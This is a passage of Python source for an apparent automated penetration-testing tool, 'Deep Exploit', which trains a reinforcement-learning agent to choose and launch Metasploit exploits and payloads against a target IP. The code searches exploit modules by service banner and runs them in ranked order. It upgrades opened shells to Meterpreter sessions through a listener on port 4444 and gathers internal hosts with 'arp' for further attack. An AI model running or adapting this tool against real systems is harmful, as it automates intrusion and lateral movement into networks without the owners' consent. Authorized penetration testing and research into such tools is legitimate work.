        print('[*] {0:04d}/{1:04d} : {2:03d}/{3:03d} {4} reward:{5} {6} {7}({8}/{9}) '
              '{10}/{11} | {12} | {13} | {14}'.format(frame,
                                                      MAX_TRAIN_NUM,
                                                      step,
                                                      MAX_STEPS,
                                                      thread_name,
                                                      str(reward),
                                                      message,
                                                      self.rhost,
                                                      target_info['protocol'],
                                                      target_info['port'],
                                                      target_info['prod_name'],
                                                      target_info['version'],
                                                      target_info['exploit'],
                                                      selected_payload,
                                                      target))
        # Set next state (s'): in learning mode a random index into
        # ``target_list`` is stored; otherwise 0.
        targets_num = 0
        if thread_type == 'learning' and len(target_list) != 0:
            targets_num = random.randint(0, len(target_list) - 1)
        self.state[ST_TARGET] = targets_num

        return self.state, reward, done, session_list

    # Execute post exploit.
    def execute_post_exploit(self, session_id, session_type):
        """Run post-exploitation reconnaissance through an opened session.

        'shell' and 'powershell' sessions are first upgraded through
        ``self.client.upgrade_shell_session`` (called with ``self.lhost`` and
        4444, presumably the listener address and port).  When the upgrade
        reports 'success', the highest key of the client's session list is
        used as the session ID from then on.  The session is then handed to
        ``get_internal_ip`` and the result is printed.

        :param session_id: ID of the session opened by the exploit.
        :param session_type: 'shell', 'powershell' or 'meterpreter'.
        :return: False for any other session type, True otherwise (including
                 the case where the shell upgrade did not succeed).
        """
        print('[+] Execute post exploitation.')

        if session_type not in ('shell', 'powershell', 'meterpreter'):
            # TODO: must explore other session type.
            print('[*] unknown session type.')
            return False

        if session_type != 'meterpreter':
            # Upgrade shell session to meterpreter.
            upgrade_result = self.client.upgrade_shell_session(session_id, self.lhost, 4444)
            if upgrade_result != 'success':
                return True
            # Continue with the session that has the highest ID.
            session_id = sorted(self.client.get_session_list().keys())[-1]

        # Search other servers in internal network.
        found_hosts = self.get_internal_ip(session_id)
        print('[*] Internal server list.\n{0}'.format(found_hosts))
        # TODO: deep exploit to other internal servers.
        return True

    # Get internal IP addresses using the Meterpreter "arp" command.
    def get_internal_ip(self, session_id):
        """Collect the IP addresses printed by ``arp`` in a Meterpreter session.

        :param session_id: ID of the Meterpreter session to run the command in.
        :return: list of dotted-quad strings extracted from the command output
                 by ``self.cutting_strings``, in that order, with every entry
                 equal to ``self.lhost`` removed.
        """
        print('[*] Searching internal servers..')
        # Execute "arp" of Meterpreter command; its return value is not used.
        self.client.execute_meterpreter(session_id, 'arp\n')
        arp_output = self.client.get_meterpreter_result(session_id)
        candidates = self.cutting_strings(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', arp_output)
        # Our own address is not an internal target.
        return [addr for addr in candidates if addr != self.lhost]


# Hyperparameters used by LocalBrain.
MIN_BATCH = 5  # Minimum number of queued samples before an update is run.
LOSS_V = 0.5  # Coefficient of the value loss.
LOSS_ENTROPY = 0.01  # Coefficient of the entropy term.
LEARNING_RATE = 0.005
RMSPropDecaly = 0.99  # Decay handed to the RMSProp optimizer.

# Discounting used for the n-step advantage (Bellman equation).
GAMMA = 0.99
N_STEP_RETURN = 5
GAMMA_N = pow(GAMMA, N_STEP_RETURN)

TRAIN_WORKERS = 10  # Number of learning threads.
TEST_WORKER = 1  # Number of testing threads (default 1).
MAX_STEPS = 20  # Maximum number of steps per episode.
MAX_TRAIN_NUM = 5000  # Learning stops once the global frame counter exceeds this.
Tmax = 5  # Weights are synchronized every Tmax steps.

# Epsilon-greedy schedule: epsilon goes linearly from EPS_START to EPS_END
# over the first EPS_STEPS frames.
EPS_START = 0.5
EPS_END = 0.0
EPS_STEPS = TRAIN_WORKERS * MAX_STEPS


# ParameterServer
class ParameterServer:
    """Owner of the shared network weights and of the optimizer applied to them."""

    def __init__(self):
        # Build the network under its own variable scope so that its weights
        # can be collected by scope name right below.
        with tf.variable_scope("parameter_server"):
            self.model = self._build_model()

        # Trainable weights of the shared network.
        self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
                                                scope="parameter_server")
        # Optimizer that the LocalBrain graphs use to apply their gradients.
        self.optimizer = tf.train.RMSPropOptimizer(LEARNING_RATE, RMSPropDecaly)

    def _build_model(self):
        """Create the network: three ReLU layers feeding a policy and a value head.

        :return: Keras model mapping a state batch to
                 ``[action probabilities, state value]``.
        """
        state_in = Input(batch_shape=(None, NUM_STATES))
        hidden = state_in
        # Layers are created in a fixed order (50, 100, 200 units).
        for units in (50, 100, 200):
            hidden = Dense(units, activation='relu')(hidden)
        policy_out = Dense(NUM_ACTIONS, activation='softmax')(hidden)
        value_out = Dense(1, activation='linear')(hidden)
        return Model(inputs=[state_in], outputs=[policy_out, value_out])


# LocalBrain
class LocalBrain:
    """Per-worker network plus the TensorFlow ops that train the shared network.

    Samples are queued with ``train_push`` and consumed in one batch by
    ``update_parameter_server``.
    """

    def __init__(self, name, parameter_server):
        with tf.name_scope(name):
            # One list per column: s, a, r, s', terminal mask of s'.
            self.train_queue = [[] for _ in range(5)]
            K.set_session(SESS)

            # Network first, then the training ops that reference it.
            self.model = self._build_model()
            self._build_graph(name, parameter_server)

    def _build_model(self):
        """Create the local network (same layout as the ParameterServer's)."""
        state_in = Input(batch_shape=(None, NUM_STATES))
        hidden = state_in
        for units in (50, 100, 200):
            hidden = Dense(units, activation='relu')(hidden)
        policy_out = Dense(NUM_ACTIONS, activation='softmax')(hidden)
        value_out = Dense(1, activation='linear')(hidden)
        network = Model(inputs=[state_in], outputs=[policy_out, value_out])
        # Have to initialize before threading.
        network._make_predict_function()
        return network

    def _build_graph(self, name, parameter_server):
        """Define the loss, its gradients and the weight-transfer ops.

        :param name: Name scope of this brain; used to collect its weights.
        :param parameter_server: Object providing ``optimizer`` and
                                 ``weights_params`` of the shared network.
        """
        self.s_t = tf.placeholder(tf.float32, shape=(None, NUM_STATES))
        self.a_t = tf.placeholder(tf.float32, shape=(None, NUM_ACTIONS))
        # Not the immediate reward but the discounted n-step return.
        self.r_t = tf.placeholder(tf.float32, shape=(None, 1))

        policy, value = self.model(self.s_t)

        # Policy loss: -log pi(a|s) * advantage, advantage treated as constant.
        chosen_prob = tf.reduce_sum(policy * self.a_t, axis=1, keep_dims=True)
        log_prob = tf.log(chosen_prob + 1e-10)
        advantage = self.r_t - value
        policy_loss = - log_prob * tf.stop_gradient(advantage)
        # Value loss: squared advantage.
        value_loss = LOSS_V * tf.square(advantage)
        # sum(p * log p) is the negative entropy; adding it to the loss
        # therefore pushes the entropy up (regularization).
        negative_entropy = LOSS_ENTROPY * tf.reduce_sum(policy * tf.log(policy + 1e-10),
                                                        axis=1, keep_dims=True)
        self.loss_total = tf.reduce_mean(policy_loss + value_loss + negative_entropy)

        # Local weights and the gradients of the loss with respect to them.
        self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
        self.grads = tf.gradients(self.loss_total, self.weights_params)

        # Local gradients are applied to the ParameterServer weights; the two
        # weight lists are paired by position.
        shared_weights = parameter_server.weights_params
        self.update_global_weight_params = \
            parameter_server.optimizer.apply_gradients(zip(self.grads, shared_weights))

        # ParameterServer -> LocalBrain copy.
        self.pull_global_weight_params = [
            local.assign(shared) for local, shared in zip(self.weights_params, shared_weights)
        ]

        # LocalBrain -> ParameterServer copy.
        self.push_local_weight_params = [
            shared.assign(local) for shared, local in zip(shared_weights, self.weights_params)
        ]

    def pull_parameter_server(self):
        """Overwrite the local weights with the ParameterServer weights."""
        SESS.run(self.pull_global_weight_params)

    def push_parameter_server(self):
        """Overwrite the ParameterServer weights with the local weights."""
        SESS.run(self.push_local_weight_params)

    def update_parameter_server(self):
        """Train the ParameterServer on the queued samples.

        Does nothing while fewer than ``MIN_BATCH`` samples are queued;
        otherwise the queue is emptied and consumed as a single batch.
        """
        if len(self.train_queue[0]) < MIN_BATCH:
            return

        print('[+] Update LocalBrain weight to ParameterServer.')
        batch, self.train_queue = self.train_queue, [[] for _ in range(5)]
        states, actions, rewards, next_states, masks = [np.vstack(column) for column in batch]
        _, next_values = self.model.predict(next_states)

        # The mask is 0 for terminal s', which removes the bootstrap value there.
        targets = rewards + GAMMA_N * next_values * masks
        SESS.run(self.update_global_weight_params,
                 {self.s_t: states, self.a_t: actions, self.r_t: targets})

    def predict_p(self, s):
        """Return the action probabilities the local network gives for ``s``."""
        probabilities, _ = self.model.predict(s)
        return probabilities

    def train_push(self, s, a, r, s_):
        """Queue one sample; ``s_ is None`` marks a terminal transition.

        Terminal samples store ``NONE_STATE`` as next state with mask 0.,
        all others store ``s_`` with mask 1.
        """
        terminal = s_ is None
        sample = (s, a, r, NONE_STATE if terminal else s_, 0. if terminal else 1.)
        for column, item in zip(self.train_queue, sample):
            column.append(item)


# Agent
class Agent:
    """Selects actions and converts raw transitions into n-step training samples."""

    def __init__(self, name, parameter_server):
        self.brain = LocalBrain(name, parameter_server)
        self.memory = []  # Pending (s, one-hot a, r, s_) transitions.
        self.R = 0.  # Time discounted total reward of the pending transitions.

    def act(self, s, available_action_list):
        """Pick an action for state ``s`` with an epsilon-greedy policy.

        Epsilon is interpolated linearly from ``EPS_START`` to ``EPS_END``
        over the first ``EPS_STEPS`` values of the global ``frames`` counter.

        :param s: Current state vector.
        :param available_action_list: Action indices that may be chosen.
        :return: ``(action, probability, ranking)``.  ``action`` is
                 'no payload' when the list is empty.  ``probability`` and
                 ``ranking`` are None for a random pick; for a greedy pick
                 ``ranking`` is the ``[action, probability]`` pairs sorted by
                 descending probability (None when the list is empty).
        """
        if frames < EPS_STEPS:
            # Linearly interpolate.
            eps = EPS_START + frames * (EPS_END - EPS_START) / EPS_STEPS
        else:
            eps = EPS_END

        explore = random.random() < eps
        has_actions = len(available_action_list) != 0

        if explore:
            # Randomly select action.
            if not has_actions:
                return 'no payload', None, None
            pick = random.randint(0, len(available_action_list) - 1)
            return available_action_list[pick], None, None

        p = self.brain.predict_p(np.array([s]))
        if not has_actions:
            # Report the probability of the last action index.
            return 'no payload', p[0][-1], None

        # Greedy: rank the available actions by predicted probability.
        ranked = [[action, p[0][action]] for action in available_action_list]
        ranked.sort(key=lambda pair: -pair[1])
        return ranked[0][0], ranked[0][1], ranked

    def advantage_push_local_brain(self, s, a, r, s_):
        """Record a transition and forward n-step samples to the LocalBrain.

        :param s: State before the action.
        :param a: Index of the action taken (stored one-hot encoded).
        :param r: Reward received.
        :param s_: Next state, or None when the episode ended.
        """
        def push_oldest(horizon):
            # Oldest pending (s, a), the current return, and the next state
            # reached ``horizon`` transitions later.
            first_state, first_action = self.memory[0][0], self.memory[0][1]
            reached_state = self.memory[horizon - 1][3]
            self.brain.train_push(first_state, first_action, self.R, reached_state)

        # One-hot encoding of the action.
        one_hot = np.zeros(NUM_ACTIONS)
        one_hot[a] = 1
        self.memory.append((s, one_hot, r, s_))

        # Fold the new reward into the running discounted return.
        self.R = (self.R + r * GAMMA_N) / GAMMA

        if s_ is None:
            # Episode over: flush every pending transition.
            while len(self.memory) > 0:
                push_oldest(len(self.memory))
                self.R = (self.R - self.memory[0][2]) / GAMMA
                self.memory.pop(0)

            self.R = 0

        if len(self.memory) >= N_STEP_RETURN:
            push_oldest(N_STEP_RETURN)
            self.R = self.R - self.memory[0][2]
            self.memory.pop(0)


# Environment.
class Environment:
    """One worker's pairing of a Metasploit environment with an A3C agent.

    ``run`` executes either one learning episode or one complete test pass,
    depending on ``thread_type``.  It reads and updates the module-level
    ``frames`` counter and ``isFinish`` flag.
    """

    # Step counts of the latest 10 episodes (replaced per instance on update).
    total_reward_vec = np.zeros(10)
    # Number of episodes this worker has finished.
    count_trial_each_thread = 0

    def __init__(self, name, thread_type, parameter_server, rhost):
        self.name = name
        self.thread_type = thread_type
        self.env = Metasploit(rhost)
        self.agent = Agent(name, parameter_server)

    def run(self, exploit_tree, target_tree):
        """Sync weights from the ParameterServer, then test or learn once.

        :param exploit_tree: Exploit tree as built by ``get_exploit_tree``.
        :param target_tree: Target information as built by ``get_target_info``.
        """
        # Copy ParameterServer weight to LocalBrain.
        self.agent.brain.pull_parameter_server()

        if self.thread_type == 'test':
            self._run_test(exploit_tree, target_tree)
        else:
            self._run_learning(exploit_tree, target_tree)

    def _run_test(self, exploit_tree, target_tree):
        """Exploit every port in ``com_port_list``, then run post-exploitation."""
        global frames    # Total number of trial in total session.
        global isFinish  # Finishing of learning/testing flag.

        session_list = []
        for port_num in com_port_list:
            # Rank every (exploit, target, payload) combination for this port.
            execute_list = []
            for exploit in target_tree[port_num]['exploit']:
                # exploit[8:] drops the first 8 characters (the 'exploit/'
                # prefix) to get the key used in the exploit tree.
                for target in exploit_tree[exploit[8:]]['target_list']:
                    skip_flag, s, payload_list, target_info = self.env.get_state(exploit_tree,
                                                                                 target_tree,
                                                                                 port_num,
                                                                                 exploit,
                                                                                 target)
                    if skip_flag is False:
                        # Get available payload index.
                        available_actions = self.env.get_available_actions(payload_list)

                        # Setting frames to EPS_STEPS makes epsilon equal to
                        # EPS_END inside Agent.act.
                        frames = EPS_STEPS
                        _, _, p_list = self.agent.act(s, available_actions)
                        # Append all payload probabilities.
                        if p_list is not None:
                            for prob in p_list:
                                execute_list.append([prob[1], exploit, target, prob[0], target_info])

            # Try the most probable combinations first.
            execute_list.sort(key=lambda entry: -entry[0])
            for idx, exe_info in enumerate(execute_list):
                _, _, done, sess_info = self.env.execute_exploit(exe_info[3],
                                                                 self.name,
                                                                 self.thread_type,
                                                                 exe_info[2],
                                                                 exe_info[4],
                                                                 idx,
                                                                 exploit_tree)

                # Store session information.
                if len(sess_info) != 0:
                    session_list.append(sess_info)

                # Change port number for next exploitation.
                if done is True:
                    break

        # Execute post exploitation.
        for session in session_list:
            self.env.execute_post_exploit(session['id'], session['type'])

        isFinish = True

    def _run_learning(self, exploit_tree, target_tree):
        """Play one learning episode and feed the experience to the agent."""
        global frames    # Total number of trial in total session.
        global isFinish  # Finishing of learning/testing flag.

        skip_flag, s, payload_list, target_list, target_info = self.env.reset_state(exploit_tree,
                                                                                    target_tree)
        # Anything other than an explicit False means the state is skipped.
        if skip_flag is not False:
            return

        step = 0
        available_actions = self.env.get_available_actions(payload_list)
        while True:
            # Decide action (randomly or epsilon greedy).
            a, _, _ = self.agent.act(s, available_actions)
            # Execute action.
            s_, r, done, _ = self.env.execute_exploit(a,
                                                      self.name,
                                                      self.thread_type,
                                                      target_list,
                                                      target_info,
                                                      step,
                                                      exploit_tree,
                                                      frames)
            step += 1

            # If trial exceed maximum number of trials at current episode,
            # finish trial at current episode.
            if step > MAX_STEPS:
                done = True

            # Increment frame number.
            frames += 1

            # 'no payload' is stored as the last payload index.
            if a == 'no payload':
                a = len(com_payload_list) - 1
            self.agent.advantage_push_local_brain(s, a, r, s_)

            s = s_
            # Train the ParameterServer and re-sync at episode end and every
            # Tmax steps.  Strings are compared with ==, not identity.
            if done or (step % Tmax == 0):
                if not isFinish and self.thread_type == 'learning':
                    self.agent.brain.update_parameter_server()
                    self.agent.brain.pull_parameter_server()

            if done:
                # Discard the oldest step count and keep the latest 10 pieces.
                self.total_reward_vec = np.hstack((self.total_reward_vec[1:], step))
                # Increment total trial number of thread.
                self.count_trial_each_thread += 1
                break

        # Output total number of trials, thread name, step count to console.
        print('[*] Thread:{0}, Trial num:{1}, Step:{2}, Avg step:{3}'.format(
            self.name,
            self.count_trial_each_thread,
            step,
            self.total_reward_vec.mean()))

        # End of learning.
        if frames > MAX_TRAIN_NUM:
            print('[*] Finish train:{0}'.format(self.name))
            isFinish = True
            print('[*] Stopping learning...')
            time.sleep(30.0)
            # Push params of thread to ParameterServer.
            self.agent.brain.push_parameter_server()


# WorkerThread
class Worker_thread:
    """Runs one Environment repeatedly until the global ``isFinish`` flag is set."""

    def __init__(self, thread_name, thread_type, parameter_server, rhost):
        self.environment = Environment(thread_name, thread_type, parameter_server, rhost)
        self.thread_name = thread_name
        self.thread_type = thread_type

    def run(self, exploit_tree, target_tree, saver=None, train_path=None):
        """Execute learning or testing until ``isFinish`` becomes true.

        A 'learning' worker then saves the session with ``saver``, closes its
        Metasploit console and returns; any other worker returns right away.

        :param exploit_tree: Exploit tree handed to ``Environment.run``.
        :param target_tree: Target information handed to ``Environment.run``.
        :param saver: Object whose ``save(SESS, train_path)`` stores the
                      learned weights; required for 'learning' workers.
        :param train_path: Destination passed to ``saver.save``.
        """
        print('[+] Executing start: {0}'.format(self.thread_name))
        while True:
            self.environment.run(exploit_tree, target_tree)
            if not isFinish:
                continue

            if self.thread_type == 'learning':
                # Stop learning thread.
                print('[*] Finish train..')
                time.sleep(3.0)

                # Save learned weights.
                print('[*] Save learned data.')
                saver.save(SESS, train_path)

                # Disconnection RPC Server.
                self.environment.env.client.termination(self.environment.env.console_id)
            else:
                # Stop testing thread.
                print('[*] Finish test.')

            # Leave the loop in both modes: the learning console has just been
            # terminated, so running another episode would use a closed console.
            break


# Placeholder globals read by the model builders and by LocalBrain.train_push.
# NOTE(review): presumably reassigned with real values before any network is
# built -- confirm against the start-up code.
NUM_STATES = 0  # Width of the state vector (network input size).
NUM_ACTIONS = 0  # Number of outputs of the softmax (policy) head.
NONE_STATE = None  # Queued as next state when a transition is terminal.


# Show initial banner.
def show_banner(delay_time=2.0):
    """Print the ASCII-art start-up banner, then pause.

    :param delay_time: Seconds to sleep after printing (handed to ``time.sleep``).
    """
    banner = """
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     　　　　　██████╗ ███████╗███████╗██████╗                      
　     　　　　██╔══██╗██╔════╝██╔════╝██╔══██╗                     
　     　　　　██║  ██║█████╗  █████╗  ██████╔╝                     
　     　　　　██║  ██║██╔══╝  ██╔══╝  ██╔═══╝                      
　     　　　　██████╔╝███████╗███████╗██║                          
　　     　　　╚═════╝ ╚══════╝╚══════╝╚═╝                          

     ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
     ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
     █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║   
     ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║   
     ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║   
     ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝    (beta)
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    """
    print(banner)
    # Give the user time to read the banner before further output scrolls by.
    time.sleep(delay_time)


# Create exploit tree.
def get_exploit_tree(env):
    """Build, or load from cache, the targets, payloads and options of each exploit.

    When ``exploit_tree.json`` already exists under ``env.data_path`` it is
    loaded and returned as is.  Otherwise every module named in the
    module-level ``com_exploit_list`` is queried through ``env.client`` and
    the resulting tree is written to that file.

    :param env: Metasploit wrapper providing ``data_path``, ``console_id``,
                ``client`` and ``cutting_strings``.
    :return: dict mapping each exploit name to ``{'targets': {target_id:
             payload_list}, 'target_list': [target_id, ...], 'options': {...}}``.
    """
    print('[+] Get exploit tree.')
    tree_path = os.path.join(env.data_path, 'exploit_tree.json')

    if os.path.exists(tree_path):
        # Get exploit tree from local file.
        print('[*] Loading exploit tree from local file: ' + tree_path)
        with codecs.open(tree_path, 'r', 'utf-8') as fin:
            return json.load(fin)

    exploit_tree = {}
    for idx, exploit in enumerate(com_exploit_list):
        # Set exploit module.
        use_cmd = 'use exploit/' + exploit + '\n'
        env.client.send_command(env.console_id, use_cmd, False)

        # Get target: re-send the command until the console output contains
        # the target table, giving up after five retries.
        show_cmd = 'show targets\n'
        target_info = ''
        time_count = 0
        while True:
            ret = env.client.send_command(env.console_id, show_cmd, False)
            target_info = ret.get(b'data').decode('utf-8')
            if 'Exploit targets' in target_info:
                break
            if time_count == 5:
                print('[*] Timeout: {0}'.format(show_cmd))
                print('[*] No exist Targets.')
                break
            time.sleep(1.0)
            time_count += 1
        target_list = env.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info)

        # Get payload list of every target.
        payloads_by_target = {}
        for target in target_list:
            payloads_by_target[target] = env.client.get_target_compatible_payload_list(exploit,
                                                                                       int(target))

        # Get options; the RPC reply uses bytes for keys and text values.
        options = env.client.get_module_options('exploit', exploit)
        option = {}
        for key, raw_sub_options in options.items():
            sub_option = {sub_key.decode('utf-8'): _decode_option_value(value)
                          for sub_key, value in raw_sub_options.items()}
            # User specify.
            sub_option['user_specify'] = ""
            option[key.decode('utf-8')] = sub_option

        # Add payloads and targets to exploit tree.
        exploit_tree[exploit] = {'targets': payloads_by_target,
                                 'target_list': target_list,
                                 'options': option}

        # Output processing status to console.
        print('[*] {0}/{1} exploit:{2}, targets:{3}'.format(str(idx + 1),
                                                            len(com_exploit_list),
                                                            exploit,
                                                            len(target_list)))

    # Save exploit tree to local file; ``with`` closes it even if dumping fails.
    with codecs.open(tree_path, 'w', 'utf-8') as fout:
        json.dump(exploit_tree, fout, indent=4)
    print('[*] Saved exploit tree.')
    return exploit_tree


def _decode_option_value(value):
    """Decode bytes (or the bytes items of a list) to str; return anything else unchanged."""
    if isinstance(value, list):
        return [item.decode('utf-8') if isinstance(item, bytes) else item for item in value]
    if isinstance(value, bytes):
        return value.decode('utf-8')
    return value


# Get target host information.
def get_target_info(env, rhost, proto_list, port_info):
    """Build, or load from cache, the per-port information of the target host.

    When ``target_info_<rhost>.json`` exists under ``env.data_path`` it is
    loaded and returned as is.  Otherwise, for every port in the module-level
    ``com_port_list``, the product name and version are taken from the port's
    banner, exploit modules are searched through the Metasploit console, and
    the resulting tree is written to that file.

    :param env: Metasploit wrapper providing ``data_path``, ``console_id``,
                ``client``, ``service_list`` and ``cutting_strings``.
    :param rhost: Address of the target host (also part of the cache file name).
    :param proto_list: Protocol of each port, parallel to ``com_port_list``.
    :param port_info: Banner text of each port, parallel to ``com_port_list``.
    :return: ``{'rhost': rhost, port: {'prod_name', 'version', 'protocol',
             'exploit'}, ...}``.  A port whose known product has no exploit
             module is left out.
    """
    print('[+] Get target info.')
    saved_file = os.path.join(env.data_path, 'target_info_' + rhost + '.json')

    if os.path.exists(saved_file):
        # Get target host information from local file.
        print('[*] Loading target tree from local file: {0}'.format(saved_file))
        with codecs.open(saved_file, 'r', 'utf-8') as fin:
            return json.load(fin)

    target_tree = {'rhost': rhost}
    for port_idx, port_num in enumerate(com_port_list):
        banner = port_info[port_idx]

        # Get product name: first known service contained in the banner.
        banner_lower = banner.lower()
        service_name = next((service for service in env.service_list if service in banner_lower),
                            'unknown')

        # Get product version.
        version, output_version = _parse_product_version(env, banner)

        temp_tree = {'prod_name': service_name,
                     'version': float(version),
                     'protocol': proto_list[port_idx],
                     'exploit': []}

        # Get exploit module.
        search_cmd = 'search name:' + service_name + ' type:exploit app:server\n'
        ret = env.client.send_command(env.console_id, search_cmd, False, 1.0)
        raw_module_info = ret.get(b'data').decode('utf-8')
        module_list = env.cutting_strings(r'(exploit/.*)', raw_module_info)
        if service_name != 'unknown' and len(module_list) == 0:
            continue
        for exploit in module_list:
            # Columns are space separated; the third one is the module rank.
            exploit_info = [column for column in exploit.split(' ') if column != '']
            # Lines with fewer than three columns carry no rank and are ignored.
            if len(exploit_info) > 2 and exploit_info[2] in {'excellent', 'great', 'good'}:
                temp_tree['exploit'].append(exploit_info[0])
        target_tree[port_num] = temp_tree

        # Output processing status to console.
        print('[*] Analyzing port {0}/{1}, {2}/{3}, '
              'Available exploit modules:{4}'.format(port_num,
                                                     temp_tree['protocol'],
                                                     temp_tree['prod_name'],
                                                     output_version,
                                                     len(temp_tree['exploit'])))

    # Save target host information; ``with`` closes the file even on failure.
    with codecs.open(saved_file, 'w', 'utf-8') as fout:
        json.dump(target_tree, fout, indent=4)
    print('[*] Saved target tree.')

    return target_tree


def _parse_product_version(env, banner):
    """Turn the version found in a banner into a string that ``float()`` accepts.

    The patterns are tried in order and the first one that matches wins.

    :param env: Object whose ``cutting_strings(pattern, text)`` returns the
                list of captured matches (assumed ``re.findall``-like).
    :param banner: Service banner of one port.
    :return: ``(version, output_version)``: the numeric encoding and the raw
             matched text, or ``(0.0, 0.0)`` when no pattern matches.
    """
    # idx=0 2.3.4, idx=1 4.7p1, idx=2 1.0.1f, idx=3 2.0 or v1.3, idx=4 3.X
    regex_list = [r'.*\s(\d{1,3}\.\d{1,3}\.\d{1,3}).*',
                  r'.*\s[a-z]?(\d{1,3}\.\d{1,3}[a-z]\d{1,3}).*',
                  r'.*\s[\w]?(\d{1,3}\.\d{1,3}\.\d[a-z]{1,3}).*',
                  r'.*\s[a-z]?(\d\.\d).*',
                  r'.*\s(\d\.[xX|\*]).*']
    for idx, regex in enumerate(regex_list):
        version_raw = env.cutting_strings(regex, banner)
        if len(version_raw) == 0:
            continue
        raw = version_raw[0]

        if idx == 0:
            # "2.3.4" -> "2.34": drop the last dot.
            index = raw.rfind('.')
            return raw[:index] + raw[index + 1:], raw
        if idx == 1:
            # "4.7p1" -> "4.71121": replace the letter by its character code.
            index = re.search(r'[a-z]', raw).start()
            return raw[:index] + str(ord(raw[index])) + raw[index + 1:], raw
        if idx == 2:
            # "1.3.5a" -> "1.3.597" -> "1.3597": replace each letter by its
            # character code, then drop the last dot of the encoded string.
            encoded = re.sub(r'[a-z]', lambda match: str(ord(match.group(0))), raw)
            index = encoded.rfind('.')
            return encoded[:index] + encoded[index + 1:], raw
        if idx == 3:
            return env.cutting_strings(r'[a-z]?(\d\.\d)', raw)[0], raw
        # idx == 4: "3.X" -- the minor part is a wildcard, keep the major digit.
        return raw[0], raw

    return 0.0, 0.0


# Get target host information for indicate port number.
def get_target_info_indicate(env, rhost, proto_list, port_info, port=None, prod_name=None):
    """Build the target tree for a user-indicated port and product list.

    Each product in *prod_name* gets its own randomly numbered "virtual port"
    entry in the tree. The exploit modules for that entry are collected by
    running a Metasploit ``search`` command through ``env.client``.

    Args:
        env: Object providing ``service_list``, ``client.send_command``,
            ``console_id``, ``cutting_strings`` and ``data_path``.
        rhost: Target address; used here only to name the output JSON file.
        proto_list: Not used by this function.
        port_info: Not used by this function.
        port: Indicated port number; stored under ``'origin_port'`` and
            echoed in the status output.
        prod_name: Product names separated by ``'@'``. ``None`` is treated as
            "no products".

    Returns:
        Tuple ``(target_tree, com_port_list)`` where ``com_port_list`` holds
        the generated virtual port numbers as strings.
    """
    print('[+] Get target info for indicate port number.')
    target_tree = {'origin_port': port}
    accepted_ranks = {'excellent', 'great', 'good'}

    # Update "com_port_list".
    com_port_list = []
    products = [] if prod_name is None else prod_name.split('@')
    for prod in products:
        virtual_port = str(np.random.randint(999999999))
        com_port_list.append(virtual_port)

        # Get product name ('unknown' when it is not a known service).
        wanted = prod.lower()
        service_name = wanted if wanted in env.service_list else 'unknown'

        # Product version is fixed to 0.0 and protocol to 'tcp' in this mode.
        temp_tree = {'prod_name': service_name, 'version': 0.0, 'protocol': 'tcp', 'exploit': []}

        # Get exploit module.
        search_cmd = 'search name:' + service_name + ' type:exploit app:server\n'
        ret = env.client.send_command(env.console_id, search_cmd, False, 1.0)
        raw_module_info = ret.get(b'data').decode('utf-8')
        module_list = env.cutting_strings(r'(exploit/.*)', raw_module_info)
        if service_name != 'unknown' and len(module_list) == 0:
            # NOTE: the virtual port is already in com_port_list at this point,
            # so the returned list can contain ports missing from target_tree.
            continue
        for exploit in module_list:
            exploit_info = [token for token in exploit.split(' ') if token != '']
            # The rank is read from the third column. Lines with fewer columns
            # (e.g. a hint line that merely mentions "exploit/...") are skipped
            # instead of raising IndexError.
            if len(exploit_info) > 2 and exploit_info[2] in accepted_ranks:
                temp_tree['exploit'].append(exploit_info[0])
        target_tree[virtual_port] = temp_tree

        # Output processing status to console.
        print('[*] Analyzing port {0}/{1}, {2}, '
              'Available exploit modules:{3}'.format(port,
                                                     temp_tree['protocol'],
                                                     temp_tree['prod_name'],
                                                     len(temp_tree['exploit'])))

    # Save target host information to local file.
    with codecs.open(os.path.join(env.data_path, 'target_info_indicate_' + rhost + '.json'), 'w', 'utf-8') as fout:
        json.dump(target_tree, fout, indent=4)

    return target_tree, com_port_list


# Check IP address format.
def is_valid_ip(arg):
    """Return True when *arg* is accepted by ``ipaddress.ip_address``.

    A ``ValueError`` from the parser is reported as False; any other
    exception propagates to the caller.
    """
    try:
        ipaddress.ip_address(arg)
    except ValueError:
        parsed_ok = False
    else:
        parsed_ok = True
    return parsed_ok


# Define command option.
# This usage text is passed to docopt() in command_parse(), so it is program
# input rather than plain documentation: the placeholder names (<ip_addr>,
# <mode>, <port>, <product>) are the keys command_parse() reads back.
# "{f}" is replaced with this script's path (__file__) when the module loads.
__doc__ = """{f}
Usage:
    {f} (-t <ip_addr> | --target <ip_addr>) (-m <mode> | --mode <mode>) [(-p <port> | --port <port>)] [(-s <product> | --service <product>)]
    {f} -h | --help

Options:
    -t --target   Require  : IP address of target server.
    -m --mode     Require  : Execution mode "train/test".
    -p --port     Optional : Indicate port number of target server.
    -s --service  Optional : Indicate product name of target server.
    -h --help     Optional : Show this screen and exit.
""".format(f=__file__)


# Parse command arguments.
def command_parse():
    """Parse the command line with docopt and return the four arguments.

    Returns:
        Tuple ``(ip_addr, mode, port, service)`` taken from the
        ``<ip_addr>``, ``<mode>``, ``<port>`` and ``<product>`` entries of
        the docopt result.
    """
    parsed = docopt(__doc__)
    wanted_keys = ('<ip_addr>', '<mode>', '<port>', '<product>')
    return tuple(parsed[key] for key in wanted_keys)


# Check parameter values.
def check_port_value(port=None, service=None):
    """Validate the optional port/service pair given on the command line.

    Args:
        port: Port number as a string, or None when no port was indicated.
        service: Product name for that port, or None.

    Returns:
        True only when *port* is a decimal string in 1..65535 that is present
        in the module-level ``com_port_list`` and *service* is neither None
        nor an integer. Every rejection except ``port is None`` prints the
        reason before returning False.
    """
